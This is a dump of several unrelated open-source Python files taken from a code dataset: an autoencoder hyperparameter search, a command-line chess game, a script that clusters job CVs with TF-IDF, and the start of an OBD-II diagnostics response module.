single \"#\" for column labels.')\n parts = self.separator.split(line[1:].strip())\n for i, part in enumerate(parts):\n self.add_field(i, part)\n return True\n\n if len(self.field_list) == 0:\n raise InsufficientHeaders('We expect exactly one one header line starting with a single \"#\" for column labels.')\n return False\n","repo_name":"Esli92/legendary-seagull-cloud","sub_path":"observaciones/scripts/WeatherHillsQA/shared/parser/belgingur.py","file_name":"belgingur.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"17656107589","text":"from deepautoencoder_012 import StackedAutoEncoder\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport numpy as np\nimport scipy.io as sio\n##import pandas\nimport scipy\nimport csv\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\n##import plotly.plotly as py\n##import pylab as plt\nimport tensorflow as tf\n\nimport skopt\nfrom skopt import gp_minimize , forest_minimize\n\n\nfrom skopt.space import Real, Categorical, Integer\nfrom skopt.plots import plot_convergence\nfrom skopt.plots import plot_objective, plot_evaluations\n##from skopt.plots import plot_histogram, plot_objective_2D\nfrom skopt.utils import use_named_args\nfrom sklearn import svm\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import KFold\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import OneHotEncoder\nfrom tempfile import TemporaryFile\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import StratifiedKFold\n\n\ndim_learning_rate = Categorical(categories=['0.0005'], name='learning_rate')\ndim_learning_rate2 = Categorical(categories=['0.001'], name='learning_rate2') \ndim_num_dense_nodes1 = Categorical(categories=['100','600','1200'], name='num_dense_nodes1') #,'1500','2000'\ndim_alpha = Categorical(categories=['0.0001','0'], name='alpha') \ndim_beta = Categorical(categories=['100','10','1','0.0001','0'], name='beta') #,,'0.1','0.01','0.001','0.0001','0.00001','0.000001' '1','2','3','4','5','6','7','8','9','10','100' '0.001','0.01', ,'0.5','2.5','7.5' ,'0.5','0.1','0.01','0.001','0.00001','0'\ndim_acf = 
Categorical(categories=['sigmoid','tanh'], name='acf') #,'relu',,'tanh' \ndim_dcf = Categorical(categories=[ 'sigmoid'], name='dcf') #,'linear'\ndim_winit = Categorical(categories=['2'], name='winit') #'1','2','3','4','5','6','7'\ndim_w = Categorical(categories=['tied','transpose'], name='w') #'he_uniform','caffe_uniform','he_normal','caffe_normal'\ndim_opt = Categorical(categories=['Adam'] ,name='opt') # 'Adam', ,'GradientDescent' ,'Adadelta','Adagrad' 'RMSProp',\ndim_epoch=Categorical(categories=['2000'], name='epoch') #,'3000','5000'\ndim_L = Categorical(categories=['rmse_LDA1','rmse_LDA2','rmse_LDA1_TFT','rmse_LDA2_TFT','rmse_LDA1_S1','rmse_LDA1_S2','rmse_LDA1_S3','rmse_LDA1_S4'], name='L')\n##dim_Drop = Categorical(categories=['0.01','0.05','0.1','0.15','0.2','0.25'], name='Drop')\ndim_stdr = Categorical(categories=['0'], name='std')\ndim_HC = Categorical(categories=['1'], name='HC') # ,'3'\ndim_Coef = Categorical(categories=['0.5'], name='Coef') #,'0.5','0.75','1' ,'0.5','0.75'\ndim_epochFC=Categorical(categories=['20000'], name='epochFC') #'500', '1000', '3000','6000', '9000', '12000','15000'\ndim_C = Categorical(categories=['0.01'], name='C') #,'0.1','1'\ndim_G = Categorical(categories=['0.001'], name='G') #'0.01','0.1','1','10'\ndim_batch= Categorical(categories=['50'], name='batch') #\n\n\n\ndimensions = [dim_learning_rate,dim_learning_rate2,\n dim_num_dense_nodes1,\n dim_alpha,\n dim_beta,\n dim_acf,\n dim_dcf,\n dim_winit,\n dim_opt,\n dim_epoch,dim_HC,dim_Coef,dim_C,dim_G,dim_batch,dim_stdr,dim_w,dim_L] #,dim_stdr,dim_epochFC,dim_Drop\n\n\ndefault_parameters = ['0.0005', '0.001', '100', '0', '1', 'tanh', 'sigmoid', '2', 'Adam', '2000', '1', '0.5', '0.01', '0.001','50','0','transpose','rmse_LDA1_S1']\n\n\ndef log_dir_name(learning_rate,learning_rate2,num_dense_nodes1,alpha,beta,acf,dcf,winit,opt,epoch,HC,Coef,C,G,batch,std,w,L): \n\n # The dir-name for the TensorBoard log-dir.\n s = \"./19_logs/lr_{0:.0e}_nodes_{1}_{2}/\"\n\n # Insert all the hyper-parameters in the dir-name.(\n log_dir = s.format(learning_rate,learning_rate2,\n num_dense_nodes1,\n alpha,\n beta,acf,dcf,winit,opt,epoch,HC,Coef,C,G,batch,std,w,L) \n\n return log_dir\n\nbest_c=0\n\n@use_named_args(dimensions=dimensions)\ndef fitness(learning_rate,learning_rate2,num_dense_nodes1 ,alpha,beta,acf,dcf,winit,opt,epoch,HC,Coef,C,G,batch,std,w,L): \n\n # Print the hyper-parameters.\n print('learning rate: ',learning_rate)\n## print('learning rate2: ',learning_rate2)\n print('num_dense_nodes1: ', num_dense_nodes1)\n print('alpha: ',alpha)\n print('beta: ',beta)\n print('acf: ',acf)\n print('dcf: ',dcf)\n## print('winit',winit)\n print('opt',opt)\n print('Epoch DRAE ',epoch)\n## print('stdr :', std)\n## print('HC :',HC)\n## print('Coef. :',Coef)\n## print('C :',C)\n## print('G. :',G) \n## print('Batch :',batch)\n print('w. 
:',w) \n print('loss :',L)\n## print('Epoch FC :',epochFC)\n print()\n\n mat = sio.loadmat('R2_sort_G0D_G2A_mat2ray_adjust(img)_pas10.mat', squeeze_me=True) \n\n X0=mat['R10'] \n X2=mat['R12']\n\n## XE=mat['R122_v']\n\n X0=X0[0:1300]\n X2=X2[0:1300]\n\n y0=np.zeros(len(X0))\n y2=np.ones(len(X2)) \n y=np.concatenate((y0,y2),axis=0)\n\n \n X=np.concatenate((X0, X2), axis=0)\n\n if(std==1):\n s = StandardScaler().fit(X)\n X0 = s.transform(X0)\n X2 = s.transform(X2)\n \n n=2\n skf = StratifiedKFold(n_splits=n,shuffle=True)\n\n## kf = KFold(n_splits=int(n),shuffle=True) \n f=fm=0\n atr=ats=0\n for train_index, test_index in skf.split(X, y):\n f+=1\n print(\"||||||||||||||||||||||||||||||||||||||||||||\")\n print(\"------------------------------------- Data\",f)\n print(\"||||||||||||||||||||||||||||||||||||||||||||\")\n\n X_train, X_test = X[train_index], X[test_index]\n y_train, y_test = y[train_index], y[test_index]\n\n X0_train=X_train[y_train==0]\n X2_train=X_train[y_train==1]\n X0_test=X_test[y_test==0]\n X2_test=X_test[y_test==1]\n## X0_train, X0_test = X0[train_index], X0[test_index]\n## X2_train, X2_test = X2[train_index], X2[test_index]\n XE=np.concatenate((X0_train, X2_train), axis=0)\n\n x0=X0_train\n x1=X2_train\n x0vl=X0_test\n x1vl=X2_test\n \n model1 = StackedAutoEncoder(dims=[int(num_dense_nodes1)], act=acf,dct=dcf, loss=L, lr=float(learning_rate),W=w,\n batch_size=int(batch), print_step=51,alpha=float(alpha),beta=float(beta),winit=winit,opt=opt , epoch=int(epoch),C=float(C),G=float(G)) #, HC=int(HC),Coef=float(Coef)\n\n F0,F0t,F2,F2t,W1,b1,f1,ats,pts,rts,fts,Lts,Lt=model1.fit(X0_train,X2_train,X0_test,X2_test,XE,1) \n sio.savemat('Features_R1_fold_'+str(f)+'_AE2.mat',{'F0': F0, 'F2': F2, 'F0t': F0t, 'F2t': F2t})\n \n## if f1<0.5:\n## break\n fm=fm+f1\n \n c=fm/n\n print(\"====================================\")\n print(\"Score: {0:.2%}\".format(c))\n print(\"====================================\")\n\n global best_c\n \n if c > best_c:\n # Update the classification accuracy.\n best_c = c #\n \n sio.savemat('R1.mat',{'F0': F0, 'F2': F2, 'F0t': F0t, 'F2t': F2t})\n\n return -c\n\n\nsearch_result = gp_minimize(func=fitness,\n dimensions=dimensions,\n acq_func='EI', # Expected Improvement.\n n_calls=100,\n x0=default_parameters)\nprint(search_result.x)","repo_name":"safaeazz/speech_recognition_motionsensors","sub_path":"optimize_param.py","file_name":"optimize_param.py","file_ext":"py","file_size_in_byte":7303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"35170256518","text":"from pieces import Pieces\nfrom pawn import Pawn\nfrom king import King\nfrom queen import Queen\nfrom bishop import Bishop\nfrom rook import Rook\nfrom knight import Knight\nimport numpy as np\n\n\nclass Game():\n def __init__(self):\n ##might need to add self before all of these\n pawn_w1 = Pawn('white', np.array([6,0]))\n pawn_w2 = Pawn('white', np.array([6,1]))\n pawn_w3 = Pawn('white', np.array([6,2]))\n pawn_w4 = Pawn('white', np.array([6,3]))\n pawn_w5 = Pawn('white', np.array([6,4]))\n pawn_w6 = Pawn('white', np.array([6,5]))\n pawn_w7 = Pawn('white', np.array([6,6]))\n pawn_w8 = Pawn('white', np.array([6,7]))\n rook_w1 = Rook('white', np.array([7,0]))\n rook_w2 = Rook('white', np.array([7,7]))\n knight_w1 = Knight('white', np.array([7,1]))\n knight_w2 = Knight('white', np.array([7,6]))\n bishop_w1 = Bishop('white', np.array([7,2]))\n bishop_w2 = Bishop('white', np.array([7,5]))\n queen_w = Queen('white', np.array([7,3]))\n self.king_w = 
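The script above wires a large, mostly-Categorical search space into `gp_minimize`. A stripped-down sketch of the same skopt pattern — two dimensions and a toy objective — showing how `use_named_args` maps dimension names onto keyword arguments (the dimension names and the loss are illustrative, not the experiment's):

```python
from skopt import gp_minimize
from skopt.space import Categorical, Real
from skopt.utils import use_named_args

dimensions = [
    Real(1e-4, 1e-1, prior="log-uniform", name="lr"),
    Categorical(["tanh", "sigmoid"], name="act"),
]

@use_named_args(dimensions=dimensions)
def objective(lr, act):
    # Toy loss: pretend tanh nets prefer lr near 1e-2.
    penalty = 0.0 if act == "tanh" else 0.5
    return (lr - 1e-2) ** 2 + penalty

result = gp_minimize(objective, dimensions, n_calls=15, random_state=0)
print(result.x, result.fun)  # best (lr, act) found and its loss
```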
King('white', np.array([7,4]))\n pawn_b1 = Pawn('black', np.array([1,0]))\n pawn_b2 = Pawn('black', np.array([1,1]))\n pawn_b3 = Pawn('black', np.array([1,2]))\n pawn_b4 = Pawn('black', np.array([1,3]))\n pawn_b5 = Pawn('black', np.array([1,4]))\n pawn_b6 = Pawn('black', np.array([1,5]))\n pawn_b7 = Pawn('black', np.array([1,6]))\n pawn_b8 = Pawn('black', np.array([1,7]))\n rook_b1 = Rook('black', np.array([0,0]))\n rook_b2 = Rook('black', np.array([0,7]))\n knight_b1 = Knight('black', np.array([0,1]))\n knight_b2 = Knight('black', np.array([0,6]))\n bishop_b1 = Bishop('black', np.array([0,2]))\n bishop_b2 = Bishop('black', np.array([0,5]))\n queen_b = Queen('black', np.array([0,3]))\n self.king_b = King('black', np.array([0,4]))\n #print(Pieces.board)\n \n #this just gives a nicer representation of the board for visual aid\n def nice_board(self):\n nice_board = np.full((8,8), None)\n for i in range(8):\n for j in range(8):\n if Pieces.board[i][j] != None:\n #nice_board[i][j] = np.array([Pieces.board[i][j].name[:2].title(), Pieces.board[i][j].colour[:1].title()])\n nice_board[i][j] = Pieces.board[i][j].name[:2].title() + '_' + Pieces.board[i][j].colour[:1].title()\n else:\n nice_board[i][j] = '____'\n\n print(nice_board)\n\n #this checks for check in all scenarios\n ## just need to add possible knight threat\n def is_check(self, king, prev_new_pos):\n\n #check to see if threat by knight\n if Pieces.board[prev_new_pos[0]][prev_new_pos[1]].name == 'knight':\n if Pieces.board[prev_new_pos[0]][prev_new_pos[1]].move(king.current_pos, Pieces.board, apply = False) == True:\n return True, prev_new_pos\n\n # Lambda function to change through the different angles\n dir = lambda angle: np.around(np.array([np.sin(angle), np.cos(angle)])/max(abs(np.array([np.cos(angle), np.sin(angle)])))).astype(int)\n #Changes to True if king is under threat\n any_threat = False\n\n #this is the angle to change the dir lambda function\n theta = 0\n #keep going until 1/8 turn around the unit circle is checked\n while theta < 2*np.pi:\n #sets position that is being checked\n pos = king.current_pos + dir(theta)\n #keep going while the position is still within the board\n while 0 <= pos[0] < 8 and 0 <= pos[1] < 8:\n #if space is non-empty\n if Pieces.board[pos[0]][pos[1]] != None:\n #if colour is same return False\n if Pieces.board[pos[0]][pos[1]].colour == king.colour:\n break\n else:\n #if colour is opposite and the take on king is valid any_threat = True\n if Pieces.board[pos[0]][pos[1]].move(king.current_pos, Pieces.board, apply = False) == True:\n any_threat = True\n break\n else:\n #adjusts the position along the direction\n pos = pos + dir(theta)\n #adds 1/8 turn to theta to check the next direction\n theta = theta + np.pi/4\n #print(any_threat)\n return any_threat, pos\n\n\n def is_check_mate(self, king, new_pos):\n #if king is under check\n if self.is_check(king, new_pos)[0] == False:\n return False\n else:\n #threat_pos = self.is_check(king, new_pos)[1]\n threat_pos = new_pos\n \n #check whether king can move away from threat\n #lambda funcion to give each directional move\n direction = lambda theta: np.around(np.array([np.cos(theta), np.sin(theta)])/max(abs(np.array([np.cos(theta), np.sin(theta)])))).astype(int)\n \n angle = 0\n #continue until we have traversed each eighth\n while angle < 2*np.pi:\n #possible position for the king\n check_pos = king.current_pos + direction(angle)\n \n #remembering original positions in case we want to return back\n space = Pieces.board[check_pos[0]][check_pos[1]]\n king_orig = 
                #if within the bounds of the board\n                if 0 <= check_pos[0] < 8 and 0 <= check_pos[1] < 8:\n                    #if the move is available\n                    #this also applies the move when it is\n                    if king.move(check_pos, Pieces.board) == False:\n                        pass\n                    else:\n                        #if king is not in check\n                        if self.is_check(king, new_pos)[0] == False:\n                            #reset the board to the previous one - I don't want to apply the move here, just check\n                            Pieces.board[king_orig[0]][king_orig[1]] = king\n                            king.current_pos = king_orig\n                            Pieces.board[check_pos[0]][check_pos[1]] = space\n                            return False\n                        #if king is in check\n                        else:\n                            #reset the board to the previous one\n                            Pieces.board[king_orig[0]][king_orig[1]] = king\n                            king.current_pos = king_orig\n                            Pieces.board[check_pos[0]][check_pos[1]] = space\n\n                #add to angle to check the next direction\n                angle += np.pi/4\n\n            #making list of positions to move to!\n            if Pieces.board[threat_pos[0]][threat_pos[1]].name != 'knight':\n                #calculating direction from threat piece to king\n                dir = king.current_pos - threat_pos\n                distance = max(abs(dir))\n                dir_hat = (dir/distance).astype(int)\n\n                #list of all positions from threat piece to king\n                pos_list = [threat_pos + i*dir_hat for i in range(distance)]\n            else:\n                #if the threat piece is a knight then we just need the knight position\n                pos_list = [threat_pos]\n\n            #check whether any piece that is alive and same colour as king can block threat - need a list of available pieces\n            #this is a list of all pieces that are the same colour as the king, are alive and are not a king\n            piece_list = [piece for piece in Pieces.instances if (piece.colour == king.colour and piece.is_alive == True and piece.name != 'king')]\n\n\n            for piece in piece_list:\n                for pos in pos_list:\n                    #if a move to block the threat is available then it is not check mate\n                    if piece.move(pos, Pieces.board, apply = False) == True:\n                        return False\n                    else:\n                        pass\n\n            return True\n\n    def is_stale_mate(self, colour):\n        #this is a list of all pieces that are the same colour as the player and are alive\n        piece_list = [piece for piece in Pieces.instances if (piece.colour == colour and piece.is_alive == True)]\n\n\n        for piece in piece_list:\n            #different condition for knight\n            if piece.name == 'knight':\n                #check all knight positions\n                pass\n            else:\n                #lambda function to give each directional move\n                direction = lambda theta: np.around(np.array([np.cos(theta), np.sin(theta)])/max(abs(np.array([np.cos(theta), np.sin(theta)])))).astype(int)\n\n                angle = 0\n                #continue until we have traversed each eighth\n                while angle < 2*np.pi:\n                    #possible position for the piece\n                    check_pos = piece.current_pos + direction(angle)\n\n                    #if within the bounds of the board\n                    if 0 <= check_pos[0] < 8 and 0 <= check_pos[1] < 8:\n                        #if the piece can move then it cannot be stalemate\n                        if piece.move(check_pos, Pieces.board, apply=False) == True:\n                            return False\n                    #add to angle to check the next direction\n                    angle += np.pi/4\n\n        return True\n\n        '''\n        FOR ABOVE: this will work for all pieces but not kings\n        we also need to distinguish whether the king moves into check\n        Not possible without applying the move as I've written it\n        '''\n\n\n\n        #check direction\n        #in each direction check the line\n        #when a move is invalid along the line, break\n\n        return False\n\n
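    #example (hypothetical inputs): is_valid_input(np.array([3.0, 9.0])) prints the caught\n    #ValueError and returns False, while is_valid_input(np.array([3.0, 4.0])) returns True\n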
    def is_valid_input(self, pos):\n        try:\n            #checks if inputs are integers\n\n            #if all(isinstance(element, int) for element in pos):\n            if pos[0].is_integer() == True and pos[1].is_integer() == True:\n                #checks if they are within the bounds of the board\n                if 0 <= pos[0] < 8 and 0 <= pos[1] < 8:\n                    return True\n                else:\n                    raise ValueError(\"The position must be within the board, that is 0-7 for each input\")\n            else:\n                raise ValueError('All elements inside your list are not integers')\n\n        except ValueError as error:\n            print('Caught an error: ' + repr(error))\n            return False\n\n    #check whether pawn has reached the end of the board\n    def is_promotion(self, new_pos):\n        if Pieces.board[new_pos[0]][new_pos[1]].name == 'pawn' and (new_pos[0] == 0 or new_pos[0] == 7):\n            return True\n        else:\n            return False\n\n    #apply promotion to the board\n    def promotion(self, new_pos):\n\n        #what piece does the player want to promote to\n        piece_letter = '0'\n        while piece_letter not in ['Q', 'K', 'B', 'R']:\n            piece_letter = input(\"Please type the letter of the piece you wish to promote to, Q=queen, K=knight, B=bishop and R=rook: \").upper()\n\n        piece_colour = Pieces.board[new_pos[0]][new_pos[1]].colour\n        piece_pos = np.array(new_pos)\n\n        #pawn is no longer alive\n        Pieces.board[new_pos[0]][new_pos[1]].is_alive = False\n\n        if piece_letter == 'Q':\n            Queen(piece_colour, piece_pos)\n        elif piece_letter == 'K':\n            Knight(piece_colour, piece_pos)\n        elif piece_letter == 'B':\n            Bishop(piece_colour, piece_pos)\n        elif piece_letter == 'R':\n            Rook(piece_colour, piece_pos)\n\n\n    def run_game(self):\n        white_or_black = 0\n        new_pos = np.array([0,0])\n\n        #previous new_pos for determining knight check\n        prev_new_pos = np.array([0,0])\n        king = self.king_w\n\n        while True:\n            #printing a visually easy board\n            self.nice_board()\n\n            #keeps track of en passant\n            Pieces.en_pass_count += 1\n            #just need to determine whose turn it is\n\n
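            #np.array([-1, -1]) acts as a sentinel meaning the player restarted their choices, so the turn is not switched\n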
position: \"))])\n if (new_pos == np.array([-1,-1])).all() == True:\n break\n\n ##this won't work for castling into a check!! I don't think\n if (new_pos == np.array([-1,-1])).all() == False:\n #remember what was in the new space in case we have to revert\n space = Pieces.board[new_pos[0]][new_pos[1]]\n\n ##if king is under check\n ##we cannot apply castling - so piece.move cannot be a castle\n if self.is_check(king, prev_new_pos)[0] == True:\n king.is_check == True\n\n #move the piece\n piece.move(new_pos, Pieces.board)\n\n #if we move our own king into check\n if self.is_check(king, prev_new_pos)[0] == True:\n #reset the board to previous one\n Pieces.board[piece_pos[0]][piece_pos[1]] = piece\n piece.current_pos = piece_pos\n Pieces.board[new_pos[0]][new_pos[1]] = space\n\n ##NEED to go back to correct board of a castle put king in check\n ##Need to replace rook and king to original positions\n \n #if there is check mate on king then break the while loop\n if self.is_check_mate(king_op, new_pos) == True:\n break\n\n #start the go again\n new_pos = np.array([-1, -1])\n print(\"This move is invalid. There is a check on the King.\")\n else:\n king.is_check == False\n #set prev_new_pos to memory for knight check\n prev_new_pos = new_pos\n \n #this is to cover the pawn change at the end\n ##NEED TO CHECK WHETHER THIS WORKS\n if self.is_promotion(new_pos) == True:\n self.promotion(new_pos)\n \n ##this might need changing when stale_mate is involved.\n ##might have to be moved within conditional for check_mate \n print(f\"The game has ended! {colour}'s have won the game.\")\n\n\ngame = Game()\ngame.run_game()\n\n\n\ndef run_game(self):\n\n\n #while checkmate and stalemate are false - stay in the game\n \n #print nice board\n\n #input piece initialised to [-1,-1]\n\n #while input is invalid ##invalid here refers to whether this is a piece of correct colour\n\n #get input from player ##if player would like to start again input [-1,-1]\n\n #if input == [-1,-1]\n #break and stay on same turn\n\n #input position initialised\n\n #while input is invalid ##invalid here refers to whether space is blank or opposite colour and the piece can move like that\n \n # get input from player ##if player would like to start again input [-1,-1]\n\n #if input == [-1,-1]\n #break and stay on same turn\n \n #if current colour is in check after move -- maybe add this to while loop?\n #invalid move, repeat input\n \n #if input is promotion\n #apply promotion\n\n #apply move\n\n #END GAME\n\n\n pass","repo_name":"leopitsillides2000/Chess","sub_path":"Pieces/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":18045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"10102329441","text":"import numpy as np\nimport pandas as pd\nimport nltk\nfrom bs4 import BeautifulSoup\nimport re\nimport os\nimport cvrml.common.constants as CONSTANTS\nfrom cvrml.common.ntlk_utility import chunkArrayOfStringForNoun\nfrom cvrml.common.file_utility import directoryFilesToArrayString\nfrom cvrml.common.file_utility import stripTags\nimport codecs\nfrom sklearn import feature_extraction\nimport pickle\n\nfrom cvrml.common.model_utility import load_training_cv_for_cat\n\n# load nltk's SnowballStemmer as variabled 'stemmer'\nfrom nltk.stem.snowball import SnowballStemmer\nstemmer = SnowballStemmer(\"english\")\n\ndef br():\n print(\"----------------------------------------------------------------------\")\n\ndef load_training_cv_category(location):\n outdata= []\n for 
def load_training_cv_category(location):\n    outdata= []\n    for file_name in os.listdir(location):\n        if file_name.startswith(\".\") : continue\n        with open(os.path.join(location,file_name), encoding=\"utf-8\") as fin:\n            doc = fin.read()\n            outdata.append(doc)\n    return outdata\n\ndef tokenize_and_stem(text):\n    # first tokenize by sentence, then by word to ensure that punctuation is caught as its own token\n    tokens = [word for sent in nltk.sent_tokenize(text) for word in nltk.word_tokenize(sent)]\n    filtered_tokens = []\n    # filter out any tokens not containing letters (e.g., numeric tokens, raw punctuation)\n    for token in tokens:\n        if re.search('[a-zA-Z]', token):\n            filtered_tokens.append(token)\n    stems = [stemmer.stem(t) for t in filtered_tokens]\n    return stems\n\ndef tokenize_only(text):\n    # first tokenize by sentence, then by word to ensure that punctuation is caught as its own token\n    tokens = [word.lower() for sent in nltk.sent_tokenize(text) for word in nltk.word_tokenize(sent)]\n    filtered_tokens = []\n    # filter out any tokens not containing letters (e.g., numeric tokens, raw punctuation)\n    for token in tokens:\n        if re.search('[a-zA-Z]', token):\n            filtered_tokens.append(token)\n    return filtered_tokens\n\n# cv_jobs = load_training_cv_category(CONSTANTS.TRAINING_CV[\"job\"])\ndef readAndSave():\n    dataDirs = [\"C:/tmp/datax-cv/resumes_and_jobs/backend_developer_jobs\"\n        ,\"C:/tmp/datax-cv/resumes_and_jobs/business_developer_jobs\" ]\n\n    docData = []\n    for dir in dataDirs :\n        docData.extend(directoryFilesToArrayString(dir))\n    print(\"Number of Files = \", len(docData))\n\n    cv_jobs = stripTags(docData)\n    cv_jobs = chunkArrayOfStringForNoun(cv_jobs)\n    pickle.dump(cv_jobs, open(\"deleteme.p\", \"wb\"))\n    # exit()\n\n# readAndSave()\n\ncv_jobs = pickle.load(open(\"deleteme.p\",\"rb\"))\nprint(\"Number of jobs cv = {0}\".format(len(cv_jobs)))\n\ntotalvocab_stemmed = []\ntotalvocab_tokenized = []\nfor i in cv_jobs:\n    allwords_stemmed = tokenize_and_stem(i)\n    totalvocab_stemmed.extend(allwords_stemmed)\n    allwords_tokenized = tokenize_only(i)\n    totalvocab_tokenized.extend(allwords_tokenized)\n\nvocab_frame = pd.DataFrame({'words': totalvocab_tokenized}, index = totalvocab_stemmed)\nprint(vocab_frame)\n\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n
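# max_df/min_df drop terms that appear in more than 80% or fewer than 20% of the documents;\n# the tokenizer argument plugs the stemming tokenizer above into the vectorizer\n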
tfidf_vectorizer = TfidfVectorizer(max_df=0.8, max_features=200000,\n                                   min_df=0.2, stop_words='english',\n                                   use_idf=True, tokenizer=tokenize_and_stem, ngram_range=(1,2))\n\ntfidf_matrix = tfidf_vectorizer.fit_transform(cv_jobs)\nterms = tfidf_vectorizer.get_feature_names()\nprint(tfidf_matrix.shape)\nprint(tfidf_matrix)\nprint(terms)\n\n# from sklearn.metrics.pairwise import cosine_similarity\n# dist = 1 - cosine_similarity(tfidf_matrix)\n# print(len(dist[0]))\n# exit()\n\nfrom sklearn.cluster import KMeans\nnum_clusters = 2\nkm = KMeans(n_clusters=num_clusters)\nkm.fit(tfidf_matrix)\nprint(km.n_clusters)\n\nclusters = km.labels_.tolist()\nprint(\"Length of cluster variable= {0}\".format(len(clusters)))\nprint(clusters)\n\nbr()\n\ndata = { 'doc': cv_jobs, 'cluster': clusters}\nframe = pd.DataFrame(data, index = [clusters] , columns = ['doc', 'cluster'])\n# print(frame)\n\nbr()\n\n# from __future__ import print_function\n\nprint(\"Top terms per cluster:\")\nprint()\norder_centroids = km.cluster_centers_.argsort()[:, ::-1]\nprint(km.cluster_centers_.argsort())\nfor i in range(num_clusters):\n    print(\"Cluster %d words:\" % i, end='')\n    for ind in order_centroids[i, :5]:\n        print(' %s' % terms[ind], end=',')\n        # print(' %s' % vocab_frame.loc[terms[ind].split(' ')].values.tolist()[0][0].encode('utf-8', 'ignore'), end=',')\n    print()\n    print()\n    print(\"Cluster %d doc:\\n\" % i, end='')\n    for title in frame.loc[i]['doc'].values.tolist():\n        print(title[:230])\n    print()\n    print()\n\n","repo_name":"sohcalvin/ref","sub_path":"python/cluster_cv.py","file_name":"cluster_cv.py","file_ext":"py","file_size_in_byte":4630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"26798078063","text":"import copy\n\nfrom obd.message import register_response_class\nfrom obd.message.response import Response\nfrom obd.message.value import *\nfrom obd.util import *\n\n###################################\n# PID $00, $20, $40, $60, $80, $A0, $C0, $E0\n\nclass PIDSupportResponse(Response):\n    \"\"\"Encapsulates the response to PID-supported requests.\n    \n    This is also used for other similar requests, such as INFTYPs in SID $09.\n    In addition to the standard Response (Message) attributes, this object\n    provides:\n    \n    pid_supported[PID] -- a boolean value indicating whether a PID is supported;\n                          this will only include values reported by this response\n                          (pid+1...pid+0x20)\n    supported_pids[] -- a list of the supported PIDs reported by this response;\n                        this makes iterating over supported PIDs very easy and legible\n    \"\"\"\n    length = 4\n    def __init__(self, message_data, offset, pid):\n        assert (pid & 0x1F) == 0\n        Response.__init__(self, message_data, offset, pid)\n\n        self.pid_supported = {}\n        self.supported_pids = []\n        bits = self.decode_integer(self.data_bytes)\n        for pid_bit in range(1, 33):\n            # test each bit in the integer corresponding to each PID\n            pid_supported = (bits & (1 << (32 - pid_bit))) != 0\n            pid = self.pid + pid_bit\n            self.pid_supported[pid] = pid_supported\n            if pid_supported:\n                self.supported_pids.append(pid)\n        return\n\n\n###################################\n# PID $01\n\nclass MonitorTest(object):\n    \"\"\"Encapsulates one system monitor test as returned by Service $01, PID $01.\n    \n    The actual response (see MonitorStatusResponse) describes multiple such\n    tests.\n    \n    name -- the name of the test\n    supported -- a boolean indicating whether the test is supported by the\n                 vehicle\n    ready -- only applicable if the test is supported, a boolean indicating\n             whether the test is ready\n    status() -- returns a string representing the test status\n    \"\"\"\n    def __init__(self, name, supported, ready):\n        self.name = name\n        self.supported = supported\n        self.ready = ready\n\n    def status(self):\n        \"\"\"Return a string representing the system monitor's status.\n\n        Ready/Not Ready only apply if the system monitor is supported.\n        \"\"\"\n        status = \"Not Supported\"\n        if (self.supported):\n            if (self.ready):\n                status = \"Ready\"\n            else:\n                status = \"Not Ready\"\n        return status\n\n    def __str__(self):\n        return \"%s: %s\" % (self.name, self.status())\n\n\nclass TestReady(Boolean):\n    \"\"\"Encapsulates test \"ready\" values in OBD responses;\n    for some insane reason, 0 = \"ready\", and 1 = not ready\"\"\"\n    def _convert_value(self, raw_value):\n        \"\"\"Invert the raw bit into the actual value represented;\n        i.e., ready is True or False\"\"\"\n        return not raw_value\n\n\nclass MonitorStatusResponse(ValueResponse):\n    \"\"\"Encapsulates the response to a Mode 01, PID 01 request.\n\n    mil -- a boolean indicating whether the Malfunction Indicator Light\n           (MIL) is lighted\n    dtc_count -- the number of Diagnostic Trouble Codes (DTCs) logged by the\n                 on-board diagnostics\n    monitors -- a dict of MonitorTest objects, one for each system monitor\n    
continuous_monitors -- a list of Continuous Monitor keys\n non_continuous_monitors -- a list of Non-Continuous Monitor keys\n \n emissions_status() -- returns a string summarizing the readiness of\n common state emissions tests\n supported_monitors() -- returns a list of supported monitor keys\n incomplete_monitors() -- returns a list of incomplete (but supported)\n monitor keys\n \"\"\"\n length = 4\n _value_factories = [\n Factory(\"DTC_CNT\", Value, [\"A0\", \"A6\"]),\n Factory(\"MIL\", OnOffBoolean, \"A7\"),\n Factory(\"MIS_SUP\", Boolean, \"B0\"),\n Factory(\"FUEL_SUP\", Boolean, \"B1\"),\n Factory(\"CCM_SUP\", Boolean, \"B2\"),\n # B3 is used to select spark vs. compression ignition\n # (diesel) tests; see __init__()\n Factory(\"MIS_RDY\", TestReady, \"B4\"),\n Factory(\"FUEL_RDY\", TestReady, \"B5\"),\n Factory(\"CCM_RDY\", TestReady, \"B6\")\n ]\n _spark_value_factories = [\n Factory(\"CAT_SUP\", Boolean, \"C0\"),\n Factory(\"HCAT_SUP\", Boolean, \"C1\"),\n Factory(\"EVAP_SUP\", Boolean, \"C2\"),\n Factory(\"AIR_SUP\", Boolean, \"C3\"),\n Factory(\"ACRF_SUP\", Boolean, \"C4\"),\n Factory(\"O2S_SUP\", Boolean, \"C5\"),\n Factory(\"HTR_SUP\", Boolean, \"C6\"),\n Factory(\"EGR_SUP\", Boolean, \"C7\"),\n Factory(\"CAT_RDY\", TestReady, \"D0\"),\n Factory(\"HCAT_RDY\", TestReady, \"D1\"),\n Factory(\"EVAP_RDY\", TestReady, \"D2\"),\n Factory(\"AIR_RDY\", TestReady, \"D3\"),\n Factory(\"ACRF_RDY\", TestReady, \"D4\"),\n Factory(\"O2S_RDY\", TestReady, \"D5\"),\n Factory(\"HTR_RDY\", TestReady, \"D6\"),\n Factory(\"EGR_RDY\", TestReady, \"D7\"),\n ]\n _diesel_value_factories = [\n Factory(\"HCCATSUP\", Boolean, 